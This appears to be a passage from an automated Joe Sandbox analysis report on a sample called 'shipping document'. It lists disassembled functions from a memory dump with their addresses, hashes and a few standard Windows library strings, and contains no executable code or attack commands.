                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2C60 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f4f344ae8f11a100a20b8274faaafa8af51c7feead2cd815d97167d8a8badb3d
                                                                                                • Instruction ID: 60723f0aa19be2fbe7d4812359747a8c13ce75796d2f1ea847b008e65da91eb8
                                                                                                • Opcode Fuzzy Hash: f4f344ae8f11a100a20b8274faaafa8af51c7feead2cd815d97167d8a8badb3d
                                                                                                • Instruction Fuzzy Hash: 9990023120540842D20071584844B86400997E0301F55C026A0125664DC715CA517A22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca4d1f7678dd428d67ce05188002d378d5d2e860d61a3a73c8cb63e00af86a5f
                                                                                                • Instruction ID: 7738587f2fec392d600fcd58eb087cbeba922202c5db820159c27f15ad73d042
                                                                                                • Opcode Fuzzy Hash: ca4d1f7678dd428d67ce05188002d378d5d2e860d61a3a73c8cb63e00af86a5f
                                                                                                • Instruction Fuzzy Hash: 0A90023120540403D20071585948747400997D0201F55D421A0425568DD7568A516622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 37031f7f8ff3d6a690348aee7632dbf22ebb90053cafcedcbe8d39cf5500b6a8
                                                                                                • Instruction ID: 5430197a9eab13f0db27944dd1757aeb845087d3b31a2f2ea76aa09aae9d8b11
                                                                                                • Opcode Fuzzy Hash: 37031f7f8ff3d6a690348aee7632dbf22ebb90053cafcedcbe8d39cf5500b6a8
                                                                                                • Instruction Fuzzy Hash: AA90022160940402D24071585858746401997D0201F55D021A0025564DC7598B556BA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f7e8794284e4ff441eaca377b9679d76a25b1272679a8488ae88da25703b9ab
                                                                                                • Instruction ID: dac4b3569841b350673bc62315f82805a71a2bf576ddf9e786884fe91e2b5633
                                                                                                • Opcode Fuzzy Hash: 8f7e8794284e4ff441eaca377b9679d76a25b1272679a8488ae88da25703b9ab
                                                                                                • Instruction Fuzzy Hash: 5990023120540402D20075985848786400997E0301F55D021A5025565EC7658A916632
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae0fc2fd9edad8a6ac3e102ac33f979b53a62d79385edd146e866168162329cd
                                                                                                • Instruction ID: 3088e2c8f6c72172a762c17022a9f5d84626afae1731be393ae5524d5d659bdb
                                                                                                • Opcode Fuzzy Hash: ae0fc2fd9edad8a6ac3e102ac33f979b53a62d79385edd146e866168162329cd
                                                                                                • Instruction Fuzzy Hash: F990026121540042D20471584844746404997E1201F55C022A2155564CC6298E615626
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 30a413e401aa528c1c9af4e20c839897ab40744df954ad43b9de9910777b33b5
                                                                                                • Instruction ID: 0b011ace586e55a8c130a7e3cb357af81582a9b47e5ed0762d6390477bb6d1b7
                                                                                                • Opcode Fuzzy Hash: 30a413e401aa528c1c9af4e20c839897ab40744df954ad43b9de9910777b33b5
                                                                                                • Instruction Fuzzy Hash: FC90026134540442D20071584854B464009D7E1301F55C025E1065564DC719CE526627
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e119eff60af86539c312c969558c7e97eceaa14a8b193c721dc68b953159c732
                                                                                                • Instruction ID: c98420deb0a7d6026f96ab84bd64180e52501b8a340b885c3877c64cf894ca19
                                                                                                • Opcode Fuzzy Hash: e119eff60af86539c312c969558c7e97eceaa14a8b193c721dc68b953159c732
                                                                                                • Instruction Fuzzy Hash: E6900221215C0042D30075684C54B47400997D0303F55C125A0155564CCA158A615A22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f8be75337f8939a247bad7ea9b634cd4967ac41b7b7d034570e4c54922b7c9d
                                                                                                • Instruction ID: fb1d68be52fc2a346755f84bf651e2a321f683b9fc702bb996e5fd39d74afe4a
                                                                                                • Opcode Fuzzy Hash: 7f8be75337f8939a247bad7ea9b634cd4967ac41b7b7d034570e4c54922b7c9d
                                                                                                • Instruction Fuzzy Hash: 5D90022160540042424071688C84A468009BBE1211755C131A0999560DC6598A655B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f994d09d8c9cb4e6209341a1ac0fcda9808141db4980f8e7b854a4c0d918944e
                                                                                                • Instruction ID: 127c201c2f8ad968049ab2af1317efc758ca1565fcb642246442d2f7ad42e1c5
                                                                                                • Opcode Fuzzy Hash: f994d09d8c9cb4e6209341a1ac0fcda9808141db4980f8e7b854a4c0d918944e
                                                                                                • Instruction Fuzzy Hash: F490023120580402D20071584C48787400997D0302F55C021A5165565EC765CA916A32
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 497437ed194a35ccf118b84b73c76bd4962d8bf208f5bfcb224b8ccc11d79400
                                                                                                • Instruction ID: 96f8393d02a9029337edd478771f8b736918a4d9f6a164e9f2525b17e7ea09cb
                                                                                                • Opcode Fuzzy Hash: 497437ed194a35ccf118b84b73c76bd4962d8bf208f5bfcb224b8ccc11d79400
                                                                                                • Instruction Fuzzy Hash: 3990023120580402D20071584C5474B400997D0302F55C021A1165565DC7258A516A72
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dadf081762ce18ea18a068adecd3b28ce34cac26868ff0e9677325c83156bfab
                                                                                                • Instruction ID: fce37b472937515ab76b58172fd940547be090d583f5ab3d13d22f5a84bf39f8
                                                                                                • Opcode Fuzzy Hash: dadf081762ce18ea18a068adecd3b28ce34cac26868ff0e9677325c83156bfab
                                                                                                • Instruction Fuzzy Hash: 9D90022130540402D20271584854746400DD7D1345F95C022E1425565DC7258B53A633
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6b31b28763ab0b18b370765c58c41a76a4aac8dd000b508aebbb309875213268
                                                                                                • Instruction ID: fb5e252ac257f670ec01b88d631254b38c05b84aabde8dfa3da5d63a8376c242
                                                                                                • Opcode Fuzzy Hash: 6b31b28763ab0b18b370765c58c41a76a4aac8dd000b508aebbb309875213268
                                                                                                • Instruction Fuzzy Hash: B690026120580403D24075584C44747400997D0302F55C021A2065565ECB298E516636
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3886a64c31f2d45e5d03ee521a27d7ca1de04a236a630804646674071b02c5be
                                                                                                • Instruction ID: 6d86ce609c4c94e190fb73779ccfb1049565e4331a85512a728ad3be4202460c
                                                                                                • Opcode Fuzzy Hash: 3886a64c31f2d45e5d03ee521a27d7ca1de04a236a630804646674071b02c5be
                                                                                                • Instruction Fuzzy Hash: A390027120540402D24071584844786400997D0301F55C021A5065564EC7598FD56B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f9f1d06d7bc0f4068c57e78a23aa5c1fdf5c4dab08de68817553cb2415d98a9
                                                                                                • Instruction ID: 1cfbd78a02b87406bba2a237a7b69af8c6bf0a67629986865a5c284e4b797422
                                                                                                • Opcode Fuzzy Hash: 5f9f1d06d7bc0f4068c57e78a23aa5c1fdf5c4dab08de68817553cb2415d98a9
                                                                                                • Instruction Fuzzy Hash: B990022160540502D20171584844756400E97D0241F95C032A1025565ECB258B92A632
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A3010 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d08f2eae1e65efee887627b39434165d7b295a8cdb11fda311756b46f836971e
                                                                                                • Instruction ID: 7c941300a887e0435e7e155bfbe6ff7182b43cbacfb28aa7175582a90bee1f49
                                                                                                • Opcode Fuzzy Hash: d08f2eae1e65efee887627b39434165d7b295a8cdb11fda311756b46f836971e
                                                                                                • Instruction Fuzzy Hash: 7390022120584442D24072584C44B4F810997E1202F95C029A4157564CCA158A555B22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A3090 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f998883817ff2c29f9f13a85f30a05617a871ab67b3e0a8c60424fe454b9b6d
                                                                                                • Instruction ID: 8d5f93982a27a2ca4670825add73a0affcdda2d1cd38d7360da276dd53027fc3
                                                                                                • Opcode Fuzzy Hash: 5f998883817ff2c29f9f13a85f30a05617a871ab67b3e0a8c60424fe454b9b6d
                                                                                                • Instruction Fuzzy Hash: 4990022124540802D24071588854747400AD7D0601F55C021A0025564DC7168B656BB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 454607729d5c16b84a8927adf2d905536906154367baeab4622c0a69bd09226f
                                                                                                • Instruction ID: 65edb45d7268317447c89eddf21ca33a0664b957d7682eea8d4a464588a5bc71
                                                                                                • Opcode Fuzzy Hash: 454607729d5c16b84a8927adf2d905536906154367baeab4622c0a69bd09226f
                                                                                                • Instruction Fuzzy Hash: 6D90022124945102D250715C48447568009B7E0201F55C031A08155A4DC6558A556722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2dd42dbc38f39d515cdb01fd2b266ed109f435bd60da5d641dd237f22032fc68
                                                                                                • Instruction ID: 220579c114dd461b3f856e7ce7f15321c9b0d0cfe131241921e1d3fc2226e713
                                                                                                • Opcode Fuzzy Hash: 2dd42dbc38f39d515cdb01fd2b266ed109f435bd60da5d641dd237f22032fc68
                                                                                                • Instruction Fuzzy Hash: 0090023520540402D61071585C44786404A97D0301F55D421A0425568DC7548AA1A622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 125d70d7421fc553769574b1cca43eb8d8a1d58d7acec09e09755717ce68d80b
                                                                                                • Instruction ID: 96b26c1e3162695b87c43dfb6659fdbe50f974eb2d0d12916cc007c3ebf94e18
                                                                                                • Opcode Fuzzy Hash: 125d70d7421fc553769574b1cca43eb8d8a1d58d7acec09e09755717ce68d80b
                                                                                                • Instruction Fuzzy Hash: FF90023120640142964072585C44B8E810997E1302B95D425A0016564CCA148A615722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction ID: 3f9b6d5bb9de535bb24dad1e5fe6bf4f6c2505685e8ac6d0a37b074cd2dbe3be
                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 0a0bc8e8af241eaeb8374d463bd76bf6dfd103cb08c5e0849d5d476989ba7733
                                                                                                • Instruction ID: 1d37addf23195b0924fdde4ccb4341c76afd0b2d812d09e5b3f5cf31aef7634a
                                                                                                • Opcode Fuzzy Hash: 0a0bc8e8af241eaeb8374d463bd76bf6dfd103cb08c5e0849d5d476989ba7733
                                                                                                • Instruction Fuzzy Hash: 8451FAB2A00116BFCB11DFACC9D097EFBB8BB886407948269F455D7646D374DE4087E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01812410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 71d49e79ae783204854e036a304937a554dc45528bda754d89b19df5719f6b67
                                                                                                • Instruction ID: 33bad3847956b67f6cab2fb8c58ebcfce6513a4924443646dae2e89218e48a38
                                                                                                • Opcode Fuzzy Hash: 71d49e79ae783204854e036a304937a554dc45528bda754d89b19df5719f6b67
                                                                                                • Instruction Fuzzy Hash: DA51E772A406456ECB64DF5CC8D09BFF7BEEF44300B248459F496C7646E6B4DB408760
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01797630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 017D4787
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017D4725
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017D4655
                                                                                                • Execute=1, xrefs: 017D4713
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017D46FC
                                                                                                • ExecuteOptions, xrefs: 017D46A0
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017D4742
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 29bd4e6694fe7212c332b37d86b0051fdc2211159af93eecebec172853c7a988
                                                                                                • Instruction ID: cbb93fe489aea184b63b42c86b1eb197eb8e5ddb1f8e34b83634d20426c33799
                                                                                                • Opcode Fuzzy Hash: 29bd4e6694fe7212c332b37d86b0051fdc2211159af93eecebec172853c7a988
                                                                                                • Instruction Fuzzy Hash: EA510971650219AAEF15AAA8EC99FEDF7B8EF58300F4400D9D605AB181E7709A49CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01836940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction ID: 7c4bf3fa2534ae6506f02c76ba762d9e75f158e0c759bfb5448bdb533a2b79e4
                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction Fuzzy Hash: 8C021671508342AFD309DF1CC494A6BBBE5FFC4704F588A2DB9958B254EB31EA05CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 9072a4fdc87c7d836e3bf53c7a01537b7f69a79d8abab75ae6707d6dc838f12d
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: A0818F70E452499EEF298E6CC8917FEFFB1AFC5320F98435AE861A7291C77498408B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: d68ba948e055a4e956b6de552bba156e4683938b5fe697f6ab2e5c438372c590
                                                                                                • Instruction ID: 7fb70119f5f8768d4a95fa3d56abfd998f5e0d310a55ac24910af924118b5971
                                                                                                • Opcode Fuzzy Hash: d68ba948e055a4e956b6de552bba156e4683938b5fe697f6ab2e5c438372c590
                                                                                                • Instruction Fuzzy Hash: 8D2151BBE00519ABDB10DF69C844AEEBBFDEF54754F540116E905E3205EB70EA018BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017D02BD
                                                                                                • RTL: Re-Waiting, xrefs: 017D031E
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017D02E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: f609d162f0f5e0d162d67bcea580a51ec586e5bbd17f1bc5feae79e04b78ec80
                                                                                                • Instruction ID: 434da31963cd3182dd89f3fc87b470e3e8e93dba78ec67d369678668dc42ed5d
                                                                                                • Opcode Fuzzy Hash: f609d162f0f5e0d162d67bcea580a51ec586e5bbd17f1bc5feae79e04b78ec80
                                                                                                • Instruction Fuzzy Hash: 91E1AD306487419FE725EF28C884B2AFBE0BB88324F140A5DF5A5CB2D1D775E945CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

